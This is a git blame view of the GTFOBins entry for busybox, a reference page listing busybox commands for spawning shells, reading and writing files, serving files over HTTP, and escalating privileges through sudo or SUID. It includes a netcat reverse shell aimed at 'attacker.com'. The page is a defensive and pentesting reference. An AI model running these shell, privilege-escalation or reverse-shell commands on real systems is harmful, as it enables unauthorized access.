1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-19 02:11:39 +02:00
GTFOBins.github.io/_gtfobins/busybox.md

31 lines
938 B
Markdown
Raw Normal View History

2018-05-31 21:09:44 +02:00
---
2023-01-19 07:13:20 +01:00
description: BusyBox may contain many UNIX utilities, run `busybox --list-full` to check what GTFOBins binaries are supported. Here some example.
2018-05-31 21:09:44 +02:00
functions:
2018-10-05 19:55:38 +02:00
shell:
2018-07-16 15:01:50 +02:00
- code: busybox sh
2018-10-05 19:55:38 +02:00
file-upload:
2018-07-16 15:01:50 +02:00
- description: Serve files in the local folder running an HTTP server.
code: |
LPORT=12345
2018-07-16 15:01:50 +02:00
busybox httpd -f -p $LPORT -h .
2018-07-04 20:26:52 +02:00
file-write:
2018-07-16 15:01:50 +02:00
- code: |
LFILE=file_to_write
busybox sh -c 'echo "DATA" > $LFILE'
2018-07-04 20:26:52 +02:00
file-read:
2018-07-16 15:01:50 +02:00
- code: |
LFILE=file_to_read
./busybox cat "$LFILE"
2018-10-05 19:55:38 +02:00
suid:
2018-07-16 15:01:50 +02:00
- description: It may drop the SUID privileges depending on the compilation flags and the runtime configuration.
code: "./busybox sh"
2018-10-05 19:55:38 +02:00
sudo:
2018-07-16 15:01:50 +02:00
- code: sudo busybox sh
reverse-shell:
- description: Run `nc -lvp 12345` on the attacker box to receive the shell.
code: |
RHOST=attacker.com
RPORT=12345
busybox nc -e /bin/sh $RHOST $RPORT
2018-05-31 21:09:44 +02:00
---